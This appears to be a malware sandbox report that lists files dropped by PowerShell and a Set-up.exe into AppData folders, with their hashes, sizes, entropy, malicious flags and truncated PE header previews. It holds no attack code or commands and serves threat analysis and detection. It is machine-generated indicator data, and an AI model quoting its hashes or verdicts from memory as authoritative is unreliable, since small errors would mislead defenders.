SHA-512:	4D02EECDDA0FFFC10D5509830079984C7A887B4CA3A80359AA56117B302DCFA594B0710C9F415C823D1674B5C689D31AADE44F21750CCD7D53010E67F0B6F0D2
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......WU...4e..4e..4e.vRe..4e.vRa..4e.vR...4e.vRg..4e.Rich.4e.................PE..d....\]\.........." .........................................................0............`.........................................`...H............ ...................9..............T............................................................................rdata..H...........................@..@.rsrc........ ......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\QHUPRmIp\x86\api-ms-win-core-util-l1-1-0.dll

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	17872
Entropy (8bit):	7.041259495908992
Encrypted:	false
SSDEEP:	384:WyzWWfhW++Y3DGk8ZpH3GCJErst5+Y3DGU1a8JN77hh8T:35DGkiRBEQpDGw3hKT
MD5:	C6553959AECD5BAC01C0673CFDF86B68
SHA1:	045585659843F7214C79659A88302996BFB480A2
SHA-256:	68BD9C086D210EB14E78F00988BA88CEAF9056C8F10746AB024990F8512A2296
SHA-512:	AE8E42A428202D05FEA4F1E6A4D3B919B644A792567F876B0FC392B1CDDB856547B4C3B433C002FDED6DF4D4DAEC8FB7235F30D1FF9F42943D9E2557ADE364D6
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......WU...4e..4e..4e.vRe..4e.vRa..4e.vR...4e.vRg..4e.Rich.4e.................PE..d......Z.........." .........................................................0............`.........................................`...<............ ...................9..............T............................................................................rdata..8...........................@..@.rsrc........ ......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\QHUPRmIp\x86\api-ms-win-crt-conio-l1-1-0.dll

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	18896
Entropy (8bit):	7.04162157199281
Encrypted:	false
SSDEEP:	384:WL5WfhWO+Y3DGk8ZpH3GCJErBf+Y3DGUCU8JN77hhIw:FVDGkiRBELDGfX3hKw
MD5:	7190CBFAD2D7773D3B88CCC25533A651
SHA1:	71FE2BACC14B433D51328EA0810C1A030C80D844
SHA-256:	4AEEAE0AC9F6C1B0B8835067EA3B7FC429F353565F18DE7858F4EA5D6F72072E
SHA-512:	B314666C400268BF261C5F9E9966AD0680435241E7A24D85B28AE4405D798B80EEDB65ED8DB7E8D93DF90F886A6719A8B7ACE8C25D0429392BC061868890C40C
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......WU...4e..4e..4e.vRe..4e.vRa..4e.vR...4e.vRg..4e.Rich.4e.................PE..d...='..........." .........................................................0.......>....`.......................................................... ...................9..............T............................................................................rdata..............................@..@.rsrc........ ......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\QHUPRmIp\x86\api-ms-win-crt-convert-l1-1-0.dll

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	21968
Entropy (8bit):	6.8725461224565505
Encrypted:	false
SSDEEP:	384:WluyxWfhWK+Y3DGk8ZpH3GCJEFxkNN0O+Y3DGEhy8JN77hhHL:RhDGkiRBEqDGsd3h9L
MD5:	3E415147CCD7C712618868BDD7A200CD
SHA1:	B332F29915D846519DCB725D39E8C50604D7B414
SHA-256:	77B69E829BDC26C7B2474BE6B8A2382345B2957E23046897E40992A8157A7BA1
SHA-512:	7E7E50F148414F8A84B4C39D3C7C1E0952F86F95873F3ABC25B7F08574BBCCE41394A59451868020B178BF68DF12615BD356677E8C935C1185C5D07D15E61896
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......WU...4e..4e..4e.vRe..4e.vRa..4e.vR...4e.vRg..4e.Rich.4e.................PE..d......n.........." .........................................................@............`..........................................................0...................9..............T............................................................................rdata..............................@..@.rsrc........0......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\QHUPRmIp\x86\api-ms-win-crt-environment-l1-1-0.dll

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	18384
Entropy (8bit):	7.021659429657045
Encrypted:	false
SSDEEP:	384:WgWfhWx+Y3DGk8ZpH3GCJEFxHiA6+Y3DGEi8JN77hhksg:CsDGkiRBEJeDG03hCD
MD5:	AD0CBB9978FCF60D9E9CA45DE6A28D30
SHA1:	65549D9D7EE72DE7D0CC356F92AD22EEB8DC18CC
SHA-256:	6C9C0DC7B36AFE07DFB07DD373FC757FF25DF4793E6384D7A6021471A474F0B9
SHA-512:	AAF4919E7629CD0BCF52283D578214043A4BDF6597A7D808DFCECD5FA1ECBD0B1395C60A165C575D20CA42928500815E14837B9E05530A667C6898E14243D64D
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......WU...4e..4e..4e.vRe..4e.vRa..4e.vR...4e.vRg..4e.Rich.4e.................PE..d...... .........." .........................................................0............`............................................."............ ...................9..............T............................................................................rdata..2...........................@..@.rsrc........ ......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\QHUPRmIp\x86\api-ms-win-crt-filesystem-l1-1-0.dll

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	19920
Entropy (8bit):	7.031497633335967
Encrypted:	false
SSDEEP:	384:Wcq6nWm5CpWfhW++Y3DGk8ZpH3GCJErNi4H+Y3DGUfhd8JN77hhcu:G6nWm5CeBDGkiRBEp5DGk63hqu
MD5:	14F407D94C77B1B0039AE2C89B07A2FF
SHA1:	528B91A8A8611DA45463FAC0A6BD5C58233F8FBC
SHA-256:	85B1B189CE9E3C6F4D2EFDD4CD82B0807F681BEA2D28851CAAF545990DE99000
SHA-512:	152B97A656ACD984592BF58854222EC97C661F9F8D19557EA03501457FB5A07821F90D332F21B1B51A5BCE5AB84F862354B8EE21C7C1F6B7AA1C127F4A73AB5D
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......WU...4e..4e..4e.vRe..4e.vRa..4e.vR...4e.vRg..4e.Rich.4e.................PE..d.....`W.........." .........................................................0............`.......................................................... ...................9..............T............................................................................rdata..............................@..@.rsrc........ ......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\QHUPRmIp\x86\api-ms-win-crt-heap-l1-1-0.dll

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	18896
Entropy (8bit):	7.000635932635543
Encrypted:	false
SSDEEP:	384:WgY3eRWfhWn+Y3DGk8ZpH3GCJErTpTX+Y3DGUm8JN77hhwJ:TGeDGkiRBERTVDGm3hiJ
MD5:	9C373C00AC3138233BDF1655C7BE8E86
SHA1:	EE38F868E32950D1B8185249EDC6AD4E1BC5592F
SHA-256:	0166EDFB23CFC77519C97862A538A69B5D805D6A17D6E235F46927AF5C04B3C9
SHA-512:	D2F56B3169C1FEA1A604523B2215DBAD02C6306BD804445B367756F288310554DD049AEFD024BABC26A3B270B8AEDE8B10E5EC8D80E772D3D1076B8013491067
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......WU...4e..4e..4e.vRe..4e.vRa..4e.vR...4e.vRg..4e.Rich.4e.................PE..d....n.p.........." .........................................................0............`.......................................................... ...................9..............T............................................................................rdata..............................@..@.rsrc........ ......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\QHUPRmIp\x86\api-ms-win-crt-locale-l1-1-0.dll

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	18384
Entropy (8bit):	7.080870494842615
Encrypted:	false
SSDEEP:	384:WVWfhW2+Y3DGk8ZpH3GCJErYIcc+Y3DGUA8JN77hhKdf:JxDGkiRBE44DGk3h09
MD5:	C5D747F96237B6E9AA85C58745D30C80
SHA1:	C6AD21597265FAF25EA8D7F09577F3E6F4F7BE10
SHA-256:	F16447B5FC7FE6FB8A6699A3CEF1B2B8BA92D408579BCC272D3DD76ACD801E2A
SHA-512:	5BCEE06D62633ECDFDF5DD1BF92FF9278F535DC5F21BFE36FAACA15E378BEB4DA6BE7BA9767569119FBF9F7383FFDB3A4A17C99D5918A64B8E12926AC0EC3140
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......WU...4e..4e..4e.vRe..4e.vRa..4e.vR...4e.vRg..4e.Rich.4e.................PE..d................." .........................................................0......'.....`.............................................e............ ...................9..............T............................................................................rdata..u...........................@..@.rsrc........ ......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\QHUPRmIp\x86\api-ms-win-crt-math-l1-1-0.dll

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	27088
Entropy (8bit):	6.650191961270333
Encrypted:	false
SSDEEP:	384:WXQUbM4Oe59Ckb1hgmLVWfhWC+Y3DGk8ZpH3GCJEr0a6eOq+Y3DGUOe8JN77hhoq:SRMq59Bb1jyRDGkiRBEQeOODGp3hqQ
MD5:	BC418A3461C5FDFA1A0D75F7E03D08A7
SHA1:	5CFEFA62226F117B7E2FE58961269294EB62B84C
SHA-256:	C7115159BABDAA1F52E478E67B4E612DA2332FDA4E4036999B29425FE303B6E8
SHA-512:	4C9F3D461A5FC42D829D517EF523423CEB18F6667E6F2D83F1E5CD645A359D32B58AC8652EA734F567ED3B9E2999F358BF0E95BF38265DF7ABE3FE4B2F5FA978
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......WU...4e..4e..4e.vRe..4e.vRa..4e.vR...4e.vRg..4e.Rich.4e.................PE..d...Q............." .........,...............................................P............`..............................................%...........@...............0...9..............T............................................................................rdata...&.......(..................@..@.rsrc........@.......,..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\QHUPRmIp\x86\api-ms-win-crt-multibyte-l1-1-0.dll

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	26064
Entropy (8bit):	6.650909182376859
Encrypted:	false
SSDEEP:	384:WPy+Kr6aLPmIHJI6/CpG3t2G3t4odXLVWfhWS+Y3DGk8ZpH3GCJErRMOnR+Y3DG3:uZKrZPmIHJI6kVDGkiRBE9nDGa3hYV
MD5:	9E9C6F83A015029808F5257F7B7E39C6
SHA1:	5674192EB60EB152773FE0D50161F32759E2EA0F
SHA-256:	C6B4E1D903B3CC83BFAFFBE4E82EEE634CFF8F97F12217CAA45B464DDC4E1455
SHA-512:	6E124732646CBE95EF94773D57B08C68A399854F906B14F15996BB12400D5E92B34596C38795A3BA4CDF8DB4E8DD5AD486890634951A4686C6679B486AB19CB0
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......WU...4e..4e..4e.vRe..4e.vRa..4e.vR...4e.vRg..4e.Rich.4e.................PE..d.....]G.........." .........(...............................................P.......:....`.............................................. ...........@...............,...9..............T............................................................................rdata...".......$..................@..@.rsrc........@.......(..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\QHUPRmIp\x86\api-ms-win-crt-private-l1-1-0.dll

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	70608
Entropy (8bit):	5.82653654092116
Encrypted:	false
SSDEEP:	1536:b/XeuJDe5c4bFe2JyhcvxXWpD7d3334BkZn+P7niDv3hO3:DXeuJDe5c4bFe2JyhcvxXWpD7d3334BD
MD5:	AD8D9A6EA592A6C8A78C67A805CEC952
SHA1:	3E9F35013044BE456F33E300418453AB12C70DF8
SHA-256:	696C10112D8B86A46E5057CBD0BF40728E79C6BB49CDA1F2C67FE45D0FC1258D
SHA-512:	31C1B5717432B67E6B150911747F34E8099C1A0870262BB3B5D3AC5C9E28B3B08E4239BD105408318806F983B3FCD10E617B2385511C46EFE9FE58A9CD4A7067
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......WU...4e..4e..4e.vRe..4e.vRa..4e.vR...4e.vRg..4e.Rich.4e.................PE..d...)............." ................................................................0w....`.............................................T................................9..............T............................................................................rdata..d...........................@..@.rsrc...............................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\QHUPRmIp\x86\api-ms-win-crt-process-l1-1-0.dll

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	18896
Entropy (8bit):	7.015371870860414
Encrypted:	false
SSDEEP:	384:W3KAWfhWk+Y3DGk8ZpH3GCJErW25tL+Y3DGURRQ8JN77hhGz:fDDGkiRBEy4BDG43hgz
MD5:	66F4E530A19ED2F6862B5CE946437875
SHA1:	016BFA4EAFB407E43ABDCD9582DBCA7DCF85D3DE
SHA-256:	542A22540CDB7DF46D957A0208D50507916F7C737BEA833931239D56EBE8D68C
SHA-512:	2653B2118F4DB250850DCEFD3536E0FD2BC55E9774376B51E586658E4E5D79A35CB425EBE0A8391124997E24C8AAA84BAC799162A31446EF47DB667A4A3F0EB9
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......WU...4e..4e..4e.vRe..4e.vRa..4e.vR...4e.vRg..4e.Rich.4e.................PE..d.....-.........." .........................................................0......G~....`.............................................x............ ...................9..............T............................................................................rdata..............................@..@.rsrc........ ......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\fmitor\QtCore4.dll

Download File

Process:	C:\Users\user\AppData\Roaming\QHUPRmIp\Set-up.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2598912
Entropy (8bit):	6.6049974235008655
Encrypted:	false
SSDEEP:	49152:VTFgiFpGXOENKSgjGkJsv6tWKFdu9C6TELyvL/6mShMZtmjNUVrciV5P+7QVg07/:V+iDaWjxJsv6tWKFdu9CZgfQ
MD5:	FECC62A37D37D9759E6B02041728AA23
SHA1:	0C5F646CAEF7A6E9073D58ED698F6CFBFB2883A3
SHA-256:	94C1395153D7758900979351E633AB68D22AE9B306EF8E253B712A1AAB54C805
SHA-512:	698F90F1248DACBD4BDC49045A4E80972783D9DCEC120D187ABD08F5EF03224B511F7870320938B7E8BE049C243FFB1C450C847429434EF2E2C09288CB9286A6
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............,..,..,J.,,..,.<,..,.<(,..,..7,..,..',..,..,..,.<.,...,.<.,...,.</,..,.<.,..,.<),..,Rich..,........................PE..L...T..Q...........!................B..............g..............U...........'......;(...@...........................!.<x..<.!.......&.......................&....................................... .@...............(............................text.............................. ..`.rdata..<...........................@..@.data....2...p&.....Z&.............@....rsrc.........&.......&.............@..@.reloc........&.......&.............@..B................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\fmitor\QtGui4.dll

Download File

Process:	C:\Users\user\AppData\Roaming\QHUPRmIp\Set-up.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	8581632
Entropy (8bit):	6.736578346160889
Encrypted:	false
SSDEEP:	98304:YxRJATZlLne1/cF6ZWHxD1HFH+J+70msIWeiLtRgi3d4PJpTcSqxyr:YxiZBG2xpljTcJy
MD5:	831BA3A8C9D9916BDF82E07A3E8338CC
SHA1:	6C89FD258937427D14D5042736FDFCCD0049F042
SHA-256:	D2C8C8B6CC783E4C00A5EF3365457D776DFC1205A346B676915E39D434F5A52D
SHA-512:	BEDA57851E0E3781ECE1D0EE53A3F86C52BA99CB045943227B6C8FC1848A452269F2768BF4C661E27DDFBE436DF82CFD1DE54706D814F81797A13FEFEC4602C5
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......0...t...t...t......p.....u...oq.\|...}...q...oq.r...}..c...t.~.....oq.i...oq.....oq.u...oq.u...oq.u...Richt...........PE..L......Q...........!......Y...).....2.S.......Y....e..............U..........P............@...........................m..c...Ul.,.....{.......................{..O..................................x'e.@.............Y..............................text...K.Y.......Y................. ..`.rdata....!...Y...!...Y.............@..@.data...t.....z.......z.............@....rsrc.........{......r{.............@..@.reloc...y....{..z...x{.............@..B........................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\fmitor\QtNetwork4.dll

Download File

Process:	C:\Users\user\AppData\Roaming\QHUPRmIp\Set-up.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1053696
Entropy (8bit):	6.539052666912709
Encrypted:	false
SSDEEP:	12288:m+PpRNPe4+DZFvnwJ9o+Hllp59K03AskvvukLosiLHrv7F0YmIYunuGS:m+hRCZhwY+Hllp59OHvfo7HrCYmItnC
MD5:	8A2E025FD3DDD56C8E4F63416E46E2EC
SHA1:	5F58FEB11E84AA41D5548F5A30FC758221E9DD64
SHA-256:	52AE07D1D6A467283055A3512D655B6A43A42767024E57279784701206D97003
SHA-512:	8E3A449163E775DC000E9674BCA81FFABC7FECD9278DA5A40659620CFC9CC07F50CC29341E74176FE10717B2A12EA3D5148D1FFC906BC809B1CD5C8C59DE7BA1
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......D.....u...u...u......u..>....u..>....u..>....u...t.".u.......u..>.._.u..>....u..>....u..>....u.Rich..u.........PE..L......Q...........!.....x...........J.............d..............U..........`......I.....@.........................P.......43..d............................ ..........................................@............................................text....v.......x.................. ..`.rdata..H>.......@...\|..............@..@.data...8=..........................@....rsrc...............................@..@.reloc...9... ...:..................@..B........................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\fmitor\QtXml4.dll

Download File

Process:	C:\Users\user\AppData\Roaming\QHUPRmIp\Set-up.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	356352
Entropy (8bit):	6.447802510709224
Encrypted:	false
SSDEEP:	6144:6gdDO1NTI8ew+Rh9CY8gjvXQ0AObEL9gqIL:6gda1FI8V+f9FFzA1IL
MD5:	E9A9411D6F4C71095C996A406C56129D
SHA1:	80B6EEFC488A1BF983919B440A83D3C02F0319DD
SHA-256:	C9B2A31BFE75D1B25EFCC44E1DF773AB62D6D5C85EC5D0BC2DFE64129F8EAB5E
SHA-512:	93BB3DD16DE56E8BED5AC8DA125681391C4E22F4941C538819AD4849913041F2E9BB807EB5570EE13DA167CFECD7A08D16AD133C244EB6D25F596073626CE8A2
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......GN.f./.5./.5./.5.W>5./.5.a55./.5..35./.5...5./.5..15./.5./.5...5...5./.5..65./.5..75./.5..05./.5Rich./.5........PE..L...Y..Q...........!.....v..........Z..............a..............U..................k....@..........................w..\...LL..d....0.......................@..hR..................................p...@...............p............................text....t.......v.................. ..`.rdata..............z..............@..@.data........ ......................@....rsrc........0......................@..@.reloc..la...@...b..................@..B........................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\fmitor\StarBurn.dll

Download File

Process:	C:\Users\user\AppData\Roaming\QHUPRmIp\Set-up.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	664064
Entropy (8bit):	6.953660087793348
Encrypted:	false
SSDEEP:	12288://gzbnbASodCXNn5FJX5KpN9VmoBBDFxna:HRSoSn5FJX5KP9VmoDW
MD5:	BBF0B66F271322A7C5701D5488D6A6DD
SHA1:	D4978E0CFCB374066BDAEFEA2AACF0417830ED95
SHA-256:	39F8082F72067BE64270647F899919582438A0C7461C439174767B139406ABD8
SHA-512:	A98C6BBB312ECB1BA30DACB39C755DE7F48EE105BB014F51F3096B225EF6A0F73258D7F142965EC94A8F4DBF8DA4D0CEF4E6E3B85D17201236FA7A02555CB532
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 3%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......f.3 ".]s".]s".]s.R s#.]s.R0s#.]s..s .]s..s+.]s".\s..]s+..s9.]s+..s..]s+..sq.]s+..s#.]s+..s#.]s+..s#.]sRich".]s........................PE..L.....NK...........!.....R...................p.......................................J....@..........................*..C6......d................................B..@................................K..@...........X................................text...SP.......R.................. ..`.data...l\|...p...T...V..............@....idata..............................@....rsrc...............................@..@.reloc...d.......d..................@..B................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\fmitor\msvcp100.dll

Download File

Process:	C:\Users\user\AppData\Roaming\QHUPRmIp\Set-up.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	421200
Entropy (8bit):	6.59808962341698
Encrypted:	false
SSDEEP:	12288:iHEqYsrMWIqz473PTiPoH/aGhUgiW6QR7t5qv3Ooc8UHkC2eKq87:iH9YsIWIW4rPTiPofaDv3Ooc8UHkC2e8
MD5:	03E9314004F504A14A61C3D364B62F66
SHA1:	0AA3CAAC24FDF9D9D4C618E2BBF0A063036CD55D
SHA-256:	A3BA6421991241BEA9C8334B62C3088F8F131AB906C3CC52113945D05016A35F
SHA-512:	2FCFF4439D2759D93C57D49B24F28AE89B7698E284E76AC65FE2B50BDEFC23A8CC3C83891D671DE4E4C0F036CEF810856DE79AC2B028AA89A895BF35ABFF8C8D
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........._d..17..17..17...7..17..7..17..07 .17(..7..17..7..17..7..17..7..17..7..17..7..17..7..17..7..17Rich..17........................PE..L.....K.........."!.................<.............x......................................@.................................`...<.... ...............V..P....0..H;..p................................/..@...............p............................text............................... ..`.data...$:.......,..................@....rsrc........ ......................@..@.reloc...S...0...T..................@..B........................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\fmitor\msvcr100.dll

Download File

Process:	C:\Users\user\AppData\Roaming\QHUPRmIp\Set-up.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	770384
Entropy (8bit):	6.908020029901359
Encrypted:	false
SSDEEP:	12288:fQmCy3NeRjkpQmj3oaMtQqjoygfXq3kon9IlbgaOxQdVJJ6j5EBKX8hR5:ImCy3VQs9MtLjTgfa3kon9FaOdEz5
MD5:	67EC459E42D3081DD8FD34356F7CAFC1
SHA1:	1738050616169D5B17B5ADAC3FF0370B8C642734
SHA-256:	1221A09484964A6F38AF5E34EE292B9AFEFCCB3DC6E55435FD3AAF7C235D9067
SHA-512:	9ED1C106DF217E0B4E4FBD1F4275486CEBA1D8A225D6C7E47B854B0B5E6158135B81BE926F51DB0AD5C624F9BD1D09282332CF064680DC9F7D287073B9686D33
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........ R.HA<.HA<.HA<.A9..KA<.HA=..A<.'7..@<.'7...A<.'7..\|A<.'7...A<.'7..IA<.'7..IA<.'7..IA<.RichHA<.........PE..L.....K.........."!................. ....... .....x.................................S....@..........................I......D...(.......................P....... L..h...8...........................pE..@............................................text............................... ..`.data...\|Z... ...N..................@....rsrc................X..............@..@.reloc.. L.......N...\..............@..B........................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\fmitor\nmprwjs

Download File

Process:	C:\Users\user\AppData\Roaming\QHUPRmIp\Set-up.exe
File Type:	data
Category:	dropped
Size (bytes):	806258
Entropy (8bit):	7.906166713118734
Encrypted:	false
SSDEEP:	24576:vcDLRkUOlnsUShXxDAv/FVjMrVB0TZKOf3hl2uNgTu4K:v6af+hXWv/fYrcZF2n8
MD5:	7AB8EF9419F402C83E0CD0346D9A1A67
SHA1:	CAA661BE7346C474DE569B19B09507C58A6F7D10
SHA-256:	4EC0EEF7CE80B0181DBF5D946C7A2D40067B9BF89292B27F7496482E2F7A80A1
SHA-512:	AACD71428A25ABB693B5E3773C94B595D659ACE9894448E733809ECFACD3E1F066B1AE4BC8D477C8B112FCFF44FD7F3A20E0A1FD39C8D7A7D199CE330C971C9D
Malicious:	false
Preview:	.....CU...DBMn..UDF...nN.]A.^..qo.Yft.A...libK..QBGi.S.......W.heeO...lty.v.rp.wl...N...Wdg.e....OmP..ZC....sV.O.m.Y.G...A..fH......._..O.ordH.W.A..A.Ewt.o.XI.A...^.gmbZs.ln.....TC..DM.R_N\....`..LB.[]Qs.vj..WN.gSVd_...p.h.Y`t..`...y.q..T.......J.XrmGy......Mq_\.Q..X.....R..d]..n.N..iL....bH^rqW..aS..g.t.].Gft........A.t.....k.jn.TL......L.aP]H.ppRNAr........._.U._ru.xvU..h\b..g.u.s.lhn..V_k...X.n...E......Wteb.pS\..Mrg...._.....neu.....]A..i[...uh...JE..........c.QVUCpgf.qM.X..Q]r[.a..vb.qLa.BT.jR.N.Z.Rd.Zy.ojPL.g..I....rlt.gH....VDGwgWi.M[I.w.fR...khW.QE..flDkK.sI..C.Eg.k..Nj..B^tl....A..i.\._vd....LlM......W..thSi...lU....N.l..mw..D.M....V.j.P`..YAfSX.]g.V.l.ir.XoF^o.hp.J\.Br.C`AO.ZhNHG.....Uyc..Uh...C..H.gw.L.I......o....\.E...WMh.[j.CP.U.ZK..P.....AFsw....Nusg.Vj.Rgu..k..^ds..Y.a.Kns.[w.V.o...vNg.[gBY....UHr.g.E.Yc..nsY.k..YE..q.udOO..T.EJ...M.xrS..\....b.b.i....D.d.H.PrHygWX]WkuNCdLjj.r.R.....f.[.......P.f....fRp.LPVSR......\M.g._.EFj.`BCr_^HO.N..d.rC.d.c^...`J.gTG.h.k.R.......u^

C:\Users\user\AppData\Roaming\fmitor\ovaw

Download File

Process:	C:\Users\user\AppData\Roaming\QHUPRmIp\Set-up.exe
File Type:	data
Category:	dropped
Size (bytes):	23929
Entropy (8bit):	5.330958085264417
Encrypted:	false
SSDEEP:	384:JnIPeydeXXzYaZ0FHB59U/yFoPIEci76d5E/SboBVBxtuMPVkFt4uayvN:JImyyzrZ0z59U/+UIEci7QaSqVBxDuvN
MD5:	90284F3D3121827201D9233A4D7CD97D
SHA1:	0DFF5C2B5AA628D7800B6FB163F7BE7948229AF5
SHA-256:	2C373D4495AA2E52A9F27039998BB42F3A5139929EC8D8E8963C30D3F558CC57
SHA-512:	DCD9C837F38970D1DD5336732ED42FA2524791C23E6410018E9E149FBD6EE584101B951F851418CA522E571A775E34EE4F45786DDDB33340FC67EF1BD1C4DB64
Malicious:	false
